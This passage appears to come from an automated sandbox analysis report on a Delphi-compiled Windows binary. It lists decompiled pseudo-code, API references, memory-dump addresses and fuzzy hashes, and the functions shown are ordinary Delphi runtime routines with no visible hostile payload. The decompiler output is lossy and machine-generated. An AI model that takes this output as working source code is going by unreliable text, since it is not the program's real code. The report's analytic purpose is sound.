					E0041BEA0(_t12, _t16, _t22, __esi, _t31);
					_t23 =  *0x442540; // 0x44258c
					_t14 =  *0x4528a4; // 0x4528f0
					E0041BEA0(_t14, _t16, _t23, _t25, _t31);
				}
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x4526e5);
				return 0;
			}

0x00452658
0x00452658
0x0045265d
0x0045265e
0x00452663
0x00452666
0x00452669
0x00452670
0x00452680
0x00452680
0x00452687
0x0045268c
0x00452691
0x00452696
0x0045269b
0x004526a0
0x004526a6
0x004526ab
0x004526b0
0x004526b6
0x004526bb
0x004526c0
0x004526c6
0x004526cb
0x004526cb
0x004526d2
0x004526d5
0x004526d8
0x004526dd

APIs

GetVersion.KERNEL32(00000000,004526DE), ref: 00452672

Part of subcall function 00452408: GetCurrentProcessId.KERNEL32(?,00000000,00452580), ref: 00452429
Part of subcall function 00452408: GlobalAddAtomA.KERNEL32(00000000), ref: 0045245C
Part of subcall function 00452408: GetCurrentThreadId.KERNEL32(?,?,00000000,00452580), ref: 00452477
Part of subcall function 00452408: GlobalAddAtomA.KERNEL32(00000000), ref: 004524AD
Part of subcall function 00452408: RegisterClipboardFormatA.USER32(00000000), ref: 004524C3
Part of subcall function 00452408: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,00452580), ref: 00452547
Part of subcall function 00452408: GetProcAddress.KERNEL32(00000000,AnimateWindow,USER32,00000000,00000000,?,?,00000000,00452580), ref: 00452558

Strings

4'E, xrefs: 004526B6
xBE, xrefs: 004526A6

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
String ID: 4'E$xBE
API String ID: 3775504709-4205913489
Opcode ID: 12efc93e9b21b8e35c556fd00cf65345ec7fc700878ff34973378f1e67702ea8
Instruction ID: d1c3aeb92f52ac606252676ce40117df8e9a2d2cb7a6564c822f0edb9cc7a0cc
Opcode Fuzzy Hash: 12efc93e9b21b8e35c556fd00cf65345ec7fc700878ff34973378f1e67702ea8
Instruction Fuzzy Hash: 4CF03C38214744ABC704EB26EE92A5A77A9E74A3053E04537F90087633DBB8AC458A8C

Uniqueness

Uniqueness Score: -1.00%

Function 00448008, Relevance: 1.6, APIs: 1, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00448008(intOrPtr* __eax, signed int* __edx) {
				signed int _v12;
				short _v14;
				char _v16;
				signed int _v20;
				intOrPtr* _v24;
				char _v280;
				signed int _t39;
				signed int _t40;
				signed int _t46;
				intOrPtr* _t47;
				signed int _t50;
				signed int _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				signed int _t67;
				signed int _t68;
				void* _t73;
				signed int* _t79;
				intOrPtr _t90;
				intOrPtr* _t96;

				_t79 = __edx;
				_t96 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
					L4:
					_t39 =  *_t79;
					if(_t39 < 0x100 || _t39 > 0x108) {
						_t40 =  *_t79;
						__eflags = _t40 - 0x200;
						if(_t40 < 0x200) {
							L30:
							__eflags = _t40 - 0xb00b;
							if(_t40 == 0xb00b) {
								E004468E4(_t96, _t79[1], _t40, _t79[2]);
							}
							L32:
							return  *((intOrPtr*)( *_t96 - 0x14))();
						}
						__eflags = _t40 - 0x20a;
						if(_t40 > 0x20a) {
							goto L30;
						}
						__eflags =  *(_t96 + 0x50) & 0x00000080;
						if(( *(_t96 + 0x50) & 0x00000080) != 0) {
							L16:
							_t46 =  *_t79 - 0x200;
							__eflags = _t46;
							if(__eflags == 0) {
								L21:
								_t47 =  *0x4bb048; // 0x4bcb7c
								E00467FC4( *_t47, _t79, _t96, __eflags);
								goto L32;
							}
							_t50 = _t46 - 1;
							__eflags = _t50;
							if(_t50 == 0) {
								L22:
								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
								if(__eflags != 0) {
									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
									goto L32;
								}
								return E00403814(_t96, __eflags);
							}
							_t53 = _t50 - 1;
							__eflags = _t53;
							if(_t53 == 0) {
								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
								goto L32;
							}
							__eflags = _t53 == 1;
							if(_t53 == 1) {
								goto L22;
							}
							_t55 =  *0x4bcadc; // 0x1c40e64
							__eflags =  *((char*)(_t55 + 0x20));
							if( *((char*)(_t55 + 0x20)) == 0) {
								goto L32;
							} else {
								_t56 =  *0x4bcadc; // 0x1c40e64
								__eflags =  *(_t56 + 0x1c);
								if( *(_t56 + 0x1c) == 0) {
									goto L32;
								}
								_t90 =  *0x4bcadc; // 0x1c40e64
								__eflags =  *_t79 -  *((intOrPtr*)(_t90 + 0x1c));
								if( *_t79 !=  *((intOrPtr*)(_t90 + 0x1c))) {
									goto L32;
								}
								GetKeyboardState( &_v280);
								_v20 =  *_t79;
								_v16 = E0045E564( &_v280);
								_v14 = _t79[1];
								_v12 = _t79[2];
								return E00403814(_t96, __eflags);
							}
							goto L21;
						}
						_t67 = _t40 - 0x203;
						__eflags = _t67;
						if(_t67 == 0) {
							L15:
							 *_t79 =  *_t79 - 2;
							__eflags =  *_t79;
							goto L16;
						}
						_t68 = _t67 - 3;
						__eflags = _t68;
						if(_t68 == 0) {
							goto L15;
						}
						__eflags = _t68 != 3;
						if(_t68 != 3) {
							goto L16;
						}
						goto L15;
					}
					_v24 = E0045E640(_t96);
					if(_v24 == 0) {
						goto L32;
					}
					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
					if(_t73 == 0) {
						goto L32;
					}
				} else {
					_v24 = E0045E640(__eax);
					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
						goto L4;
					} else {
						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
						if(_t73 == 0) {
							goto L4;
						}
					}
				}
				return _t73;
			}

0x00448014
0x00448016
0x0044801c
0x00448054
0x00448054
0x0044805b
0x00448094
0x00448096
0x0044809b
0x00448173
0x00448173
0x00448178
0x00448185
0x00448185
0x0044818a
0x00000000
0x00448190
0x004480a1
0x004480a6
0x00000000
0x00000000
0x004480ac
0x004480b0
0x004480c6
0x004480c8
0x004480c8
0x004480cd
0x004480da
0x004480dc
0x004480e5
0x00000000
0x004480e5
0x004480cf
0x004480cf
0x004480d0
0x004480ef
0x004480ef
0x004480f3
0x00448105
0x00000000
0x00448105
0x00000000
0x004480fb
0x004480d2
0x004480d2
0x004480d3
0x0044810c
0x00000000
0x0044810c
0x004480d5
0x004480d6
0x00000000
0x00000000
0x00448113
0x00448118
0x0044811c
0x00000000
0x0044811e
0x0044811e
0x00448123
0x00448127
0x00000000
0x00000000
0x0044812b
0x00448131
0x00448134
0x00000000
0x00000000
0x0044813d
0x00448144
0x00448152
0x00448159
0x00448160
0x00000000
0x0044816c
0x00000000
0x0044811c
0x004480b2
0x004480b2
0x004480b7
0x004480c3
0x004480c3
0x004480c3
0x00000000
0x004480c3
0x004480b9
0x004480b9
0x004480bc
0x00000000
0x00000000
0x004480be
0x004480c1
0x00000000
0x00000000
0x00000000
0x004480c1
0x0044806b
0x00448072
0x00000000
0x00000000
0x00448081
0x00448089
0x00000000
0x0044808f
0x0044801e
0x00448025
0x0044802c
0x00000000
0x0044803a
0x00448049
0x0044804e
0x00000000
0x00000000
0x0044804e
0x0044802c
0x00448199

APIs

GetKeyboardState.USER32(?), ref: 0044813D

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: KeyboardState
String ID:
API String ID: 1724228437-0
Opcode ID: 83d6fb8417ee5df20fac9c9e48d5e425b0a9465d4f21e6aff5de0fd420e2d9a6
Instruction ID: 23351c957653fd85c00bce8afb9faa080636c556465c822262597cf546ea43ee
Opcode Fuzzy Hash: 83d6fb8417ee5df20fac9c9e48d5e425b0a9465d4f21e6aff5de0fd420e2d9a6
Instruction Fuzzy Hash: 43419131A10A59CBEB24DF29C5887AE77A0EF45304F1841AFD404D7395CB78DD8ACB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041C244, Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0041C244(void* __eax, struct HINSTANCE__* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				intOrPtr _t15;
				struct HINSTANCE__* _t20;
				intOrPtr* _t22;
				intOrPtr _t30;
				void* _t32;
				intOrPtr* _t35;
				intOrPtr _t38;
				intOrPtr _t40;

				_t38 = _t40;
				_push(_t22);
				_t35 = _t22;
				_t20 = __edx;
				_t32 = __eax;
				if(__edx == 0) {
					_t20 =  *0x4bc668; // 0x400000
				}
				_t10 = FindResourceA(_t20, E00404898(_t32), 0xa) & 0xffffff00 | _t9 != 0x00000000;
				_t43 = _t10;
				if(_t10 == 0) {
					return _t10;
				} else {
					_v8 = E0041F904(_t20, 1, 0xa, _t32);
					_push(_t38);
					_push(0x41c2b8);
					_push( *[fs:eax]);
					 *[fs:eax] = _t40;
					_t15 = E0041F264(_v8, _t20,  *_t35, _t32, _t35, _t43); // executed
					 *_t35 = _t15;
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(E0041C2BF);
					return E0040360C(_v8);
				}
			}

0x0041c245
0x0041c247
0x0041c24b
0x0041c24d
0x0041c24f
0x0041c253
0x0041c255
0x0041c255
0x0041c26d
0x0041c270
0x0041c272
0x0041c2c6
0x0041c274
0x0041c285
0x0041c28a
0x0041c28b
0x0041c290
0x0041c293
0x0041c29b
0x0041c2a0
0x0041c2a4
0x0041c2a7
0x0041c2aa
0x0041c2b7
0x0041c2b7

APIs

FindResourceA.KERNEL32 ref: 0041C266

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: FindResource
String ID:
API String ID: 1635176832-0
Opcode ID: 7bfbe446d2d84500afd1fadd4ddbe064e00040a78e4814cbe6764901e3a11311
Instruction ID: 8f4a0249fe31a095edc46022bcc5edd5554435d2a617b7370035fc5565dbad6a
Opcode Fuzzy Hash: 7bfbe446d2d84500afd1fadd4ddbe064e00040a78e4814cbe6764901e3a11311
Instruction Fuzzy Hash: 6801F771344300AFD710EFAADCC2EAAB7DDDB8971472144BBF90497341DA7A9C419618

Uniqueness

Uniqueness Score: -1.00%

Function 00466610, Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00466610(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
				_push(_t26); // executed
				L0040703C(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}

0x0046661c
0x00466626
0x0046662f
0x00466636
0x00466639
0x0046663a
0x00466645
0x00466649

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0046663A

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 91ca66a9679377342874cd30426f3a04ba6fd3dd0fed8150f316d0d28609db02
Instruction ID: e01f34afe475e9cab5e137cf35324e53cded2bf6606f3e9f2aeda5279b241760
Opcode Fuzzy Hash: 91ca66a9679377342874cd30426f3a04ba6fd3dd0fed8150f316d0d28609db02
Instruction Fuzzy Hash: B1F0C579605608AFDB40DF9DC588D4AFBE8BB4C260B458295B988CB321C234FD818F94

Uniqueness

Uniqueness Score: -1.00%

Function 0049FF2C, Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

HI, xrefs: 0049FF64

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitFreeHandleLibraryModuleProcess
String ID: HI
API String ID: 3233083275-2966693143
Opcode ID: 62e1f0283fa6afb04e926ccf4dc0f5f49e4a19d43571b2a030579f40154512e8
Instruction ID: 8ed9c937d12703e5ceca14373ca5036638f973053a73cf6211334a43e12a0917
Opcode Fuzzy Hash: 62e1f0283fa6afb04e926ccf4dc0f5f49e4a19d43571b2a030579f40154512e8
Instruction Fuzzy Hash: 1551475018E3C20FC3139B749C74495BFB0AE1321632D46EFD8C18B2A3D65CA89AD76B

Uniqueness

Uniqueness Score: -1.00%

Function 00466118, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 132
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00466118(void* __eax, void* __ebx, void* __ecx) {
				struct _WNDCLASSA _v44;
				char _v48;
				char* _t22;
				long _t23;
				CHAR* _t26;
				struct HINSTANCE__* _t27;
				intOrPtr* _t29;
				signed int _t32;
				intOrPtr* _t33;
				signed int _t36;
				struct HINSTANCE__* _t37;
				void* _t39;
				CHAR* _t40;
				struct HWND__* _t41;
				char* _t47;
				char* _t52;
				long _t55;
				long _t59;
				struct HINSTANCE__* _t62;
				intOrPtr _t64;
				void* _t69;
				struct HMENU__* _t70;
				void* _t71;
				intOrPtr _t77;
				void* _t83;
				short _t88;

				_t71 = __ecx;
				_v48 = 0;
				_t69 = __eax;
				_push(_t83);
				_push(0x4662b9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83 + 0xffffffd4;
				if( *((char*)(__eax + 0xa4)) != 0) {
					L13:
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(0x4662c0);
					return E004043D8( &_v48);
				}
				_t22 =  *0x4bb0d8; // 0x4bc04c
				if( *_t22 != 0) {
					goto L13;
				}
				_t23 = E00426074(E00466698, __eax); // executed
				 *(_t69 + 0x40) = _t23;
				 *0x4a1028 = L0040703C;
				_t26 =  *0x4a1048; // 0x465dec
				_t27 =  *0x4bc668; // 0x400000
				if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
					_t62 =  *0x4bc668; // 0x400000
					 *0x4a1034 = _t62;
					_t88 = RegisterClassA(0x4a1024);
					if(_t88 == 0) {
						_t64 =  *0x4bad60; // 0x42640c
						E0040656C(_t64, _t71,  &_v48);
						E0040CAC4(_v48, 1);
						E00403DEC();
					}
				}
				_t29 =  *0x4bae68; // 0x4bc904
				_t32 =  *((intOrPtr*)( *_t29))(0) >> 1;
				if(_t88 < 0) {
					asm("adc eax, 0x0");
				}
				_t33 =  *0x4bae68; // 0x4bc904
				_t36 =  *((intOrPtr*)( *_t33))(1, _t32) >> 1;
				if(_t88 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t36);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t37 =  *0x4bc668; // 0x400000
				_push(_t37);
				_push(0);
				_t7 = _t69 + 0x8c; // 0xafcc0045
				_t39 = E00404898( *_t7);
				_t40 =  *0x4a1048; // 0x465dec, executed
				_t41 = E00407624(_t40, _t39); // executed
				 *(_t69 + 0x30) = _t41;
				_t9 = _t69 + 0x8c; // 0x45e140
				E004043D8(_t9);
				 *((char*)(_t69 + 0xa4)) = 1;
				_t11 = _t69 + 0x40; // 0x10e80000
				_t12 = _t69 + 0x30; // 0xe
				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
				_t47 =  *0x4baf14; // 0x4bcae0
				if( *_t47 != 0) {
					_t55 = E00466D98(_t69);
					_t13 = _t69 + 0x30; // 0xe
					SendMessageA( *_t13, 0x80, 1, _t55); // executed
					_t59 = E00466D98(_t69);
					_t14 = _t69 + 0x30; // 0xe
					SetClassLongA( *_t14, 0xfffffff2, _t59); // executed
				}
				_t15 = _t69 + 0x30; // 0xe
				_t70 = GetSystemMenu( *_t15, "true");
				DeleteMenu(_t70, 0xf030, 0);
				DeleteMenu(_t70, 0xf000, 0);
				_t52 =  *0x4baf14; // 0x4bcae0
				if( *_t52 != 0) {
					DeleteMenu(_t70, 0xf010, 0);
				}
				goto L13;
			}

0x00466118
0x00466121
0x00466124
0x00466128
0x00466129
0x0046612e
0x00466131
0x0046613b
0x004662a3
0x004662a5
0x004662a8
0x004662ab
0x004662b8
0x004662b8
0x00466141
0x00466149
0x00000000
0x00000000
0x00466155
0x0046615a
0x00466162
0x0046616b
0x00466171
0x0046617e
0x00466180
0x00466185
0x00466194
0x00466197
0x0046619c
0x004661a1
0x004661b0
0x004661b5
0x004661b5
0x00466197
0x004661bc
0x004661c5
0x004661c7
0x004661c9
0x004661c9
0x004661cf
0x004661d8
0x004661da
0x004661dc
0x004661dc
0x004661df
0x004661e0
0x004661e2
0x004661e4
0x004661e6
0x004661e8
0x004661ed
0x004661ee
0x004661f0
0x004661f6
0x00466202
0x00466207
0x0046620c
0x0046620f
0x00466215
0x0046621a
0x00466221
0x00466227
0x0046622b
0x00466230
0x00466238
0x0046623c
0x00466249
0x0046624d
0x00466254
0x0046625c
0x00466260
0x00466260
0x00466267
0x00466270
0x0046627a
0x00466287
0x0046628c
0x00466294
0x0046629e
0x0046629e
0x00000000

APIs

Part of subcall function 00426074: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0042609B

GetClassInfoA.USER32(00400000,00465DEC,?), ref: 00466177
RegisterClassA.USER32(004A1024), ref: 0046618F

Part of subcall function 0040656C: LoadStringA.USER32 ref: 0040659E

SetWindowLongA.USER32 ref: 0046622B
SendMessageA.USER32 ref: 0046624D
SetClassLongA.USER32(0000000E,000000F2,00000000), ref: 00466260
GetSystemMenu.USER32 ref: 0046626B
DeleteMenu.USER32 ref: 0046627A
DeleteMenu.USER32 ref: 00466287
DeleteMenu.USER32 ref: 0046629E

Strings

<p@, xrefs: 00466162
]F, xrefs: 0046616B, 00466202

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
String ID: <p@$]F
API String ID: 2103932818-3906150556
Opcode ID: 110c0c2f661ac4536de843507b76315c96f7d1763f6c5fbcd27b836a60ffbd7e
Instruction ID: c1e0582a264028a61f34acac365863a1439996b032cb5265ab521e5461c5710b
Opcode Fuzzy Hash: 110c0c2f661ac4536de843507b76315c96f7d1763f6c5fbcd27b836a60ffbd7e
Instruction Fuzzy Hash: DE414271B443406FE710EB69DC82FAA37A8AB45704F055576FA00EF2E2D6B9AC40872D

Uniqueness

Uniqueness Score: -1.00%

Function 00452408, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00452408(void* __ebx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				short _t27;
				char _t29;
				intOrPtr _t35;
				short _t37;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t53;
				struct HINSTANCE__* _t63;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t83;
				void* _t87;

				_v20 = 0;
				_v8 = 0;
				_push(_t87);
				_push(0x452580);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe0;
				_v16 = GetCurrentProcessId();
				_v12 = 0;
				E00409B8C("Delphi%.8X", 0,  &_v16,  &_v8);
				E0040442C(0x4bcaec, _v8);
				_t25 =  *0x4bcaec; // 0x1c40dec
				_t27 = GlobalAddAtomA(E00404898(_t25)); // executed
				 *0x4bcae8 = _t27;
				_t29 =  *0x4bc668; // 0x400000
				_v36 = _t29;
				_v32 = 0;
				_v28 = GetCurrentThreadId();
				_v24 = 0;
				E00409B8C("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
				E0040442C(0x4bcaf0, _v20);
				_t35 =  *0x4bcaf0; // 0x1c40e08
				_t37 = GlobalAddAtomA(E00404898(_t35)); // executed
				 *0x4bcaea = _t37;
				_t38 =  *0x4bcaf0; // 0x1c40e08
				 *0x4bcaf4 = RegisterClipboardFormatA(E00404898(_t38));
				 *0x4bcb2c = E0041CAC4(1);
				E0045200C();
				 *0x4bcadc = E00451E28(1, 1);
				_t47 = E00464C44(1, __edi);
				_t78 =  *0x4bb224; // 0x4bcb80
				 *_t78 = _t47;
				_t49 = E00465DFC(0, 1);
				_t80 =  *0x4bb048; // 0x4bcb7c
				 *_t80 = _t49;
				_t50 =  *0x4bb048; // 0x4bcb7c
				E00467ACC( *_t50, 1);
				_t53 =  *0x441498; // 0x44149c
				E0041BFE0(_t53, 0x443da8, 0x443db8);
				_t63 = GetModuleHandleA("USER32");
				if(_t63 != 0) {
					 *0x4a0ce4 = GetProcAddress(_t63, "AnimateWindow");
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x452587);
				E004043D8( &_v20);
				return E004043D8( &_v8);
			}

0x00452411
0x00452414
0x00452419
0x0045241a
0x0045241f
0x00452422
0x0045242e
0x00452431
0x0045243f
0x0045244c
0x00452451
0x0045245c
0x00452461
0x0045246b
0x00452470
0x00452473
0x0045247c
0x0045247f
0x00452490
0x0045249d
0x004524a2
0x004524ad
0x004524b2
0x004524b8
0x004524c8
0x004524d9
0x004524de
0x004524ef
0x004524fd
0x00452502
0x00452508
0x00452513
0x00452518
0x0045251e
0x00452520
0x00452529
0x00452538
0x0045253d
0x0045254c
0x00452550
0x0045255d
0x0045255d
0x00452564
0x00452567
0x0045256a
0x00452572
0x0045257f

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00452580), ref: 00452429
GlobalAddAtomA.KERNEL32(00000000), ref: 0045245C
GetCurrentThreadId.KERNEL32(?,?,00000000,00452580), ref: 00452477
GlobalAddAtomA.KERNEL32(00000000), ref: 004524AD
RegisterClipboardFormatA.USER32(00000000), ref: 004524C3

Part of subcall function 0041CAC4: RtlInitializeCriticalSection.KERNEL32(0041A008,?,?,0042635D,00000000,00426381), ref: 0041CAE3

Part of subcall function 0045200C: SetErrorMode.KERNEL32(00008000), ref: 00452025
Part of subcall function 0045200C: GetModuleHandleA.KERNEL32(USER32,00000000,00452172,?,00008000), ref: 00452049
Part of subcall function 0045200C: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME,USER32,00000000,00452172,?,00008000), ref: 00452056
Part of subcall function 0045200C: LoadLibraryA.KERNEL32(imm32.dll), ref: 00452072
Part of subcall function 0045200C: GetProcAddress.KERNEL32(00000000,ImmGetContext,imm32.dll,00000000,00452172,?,00008000), ref: 00452094
Part of subcall function 0045200C: GetProcAddress.KERNEL32(00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00452172,?,00008000), ref: 004520A9
Part of subcall function 0045200C: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00452172,?,00008000), ref: 004520BE
Part of subcall function 0045200C: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00452172,?,00008000), ref: 004520D3
Part of subcall function 0045200C: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00452172,?,00008000), ref: 004520E8
Part of subcall function 0045200C: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000,00452172), ref: 004520FD
Part of subcall function 0045200C: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,imm32.dll,00000000), ref: 00452112
Part of subcall function 0045200C: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext), ref: 00452127
Part of subcall function 0045200C: GetProcAddress.KERNEL32(00000000,ImmIsIME,00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext), ref: 0045213C
Part of subcall function 0045200C: GetProcAddress.KERNEL32(00000000,ImmNotifyIME,00000000,ImmIsIME,00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus), ref: 00452151
Part of subcall function 0045200C: SetErrorMode.KERNEL32(?,00452179,00008000), ref: 0045216C

Part of subcall function 00464C44: GetKeyboardLayout.USER32 ref: 00464C89
Part of subcall function 00464C44: GetDC.USER32(00000000), ref: 00464CDE
Part of subcall function 00464C44: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00464CE8
Part of subcall function 00464C44: ReleaseDC.USER32(00000000,00000000), ref: 00464CF3

Part of subcall function 00465DFC: LoadIconA.USER32 ref: 00465EE1
Part of subcall function 00465DFC: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00452518,00000000,00000000,?,?,00000000,00452580), ref: 00465F13
Part of subcall function 00465DFC: OemToCharA.USER32 ref: 00465F26
Part of subcall function 00465DFC: CharNextA.USER32(?), ref: 00465F73
Part of subcall function 00465DFC: CharLowerA.USER32 ref: 00465F79

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,00452580), ref: 00452547
GetProcAddress.KERNEL32(00000000,AnimateWindow,USER32,00000000,00000000,?,?,00000000,00452580), ref: 00452558

Strings

Delphi%.8X, xrefs: 0045243A
AnimateWindow, xrefs: 00452552
USER32, xrefs: 00452542
ControlOfs%.8X%.8X, xrefs: 0045248B

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
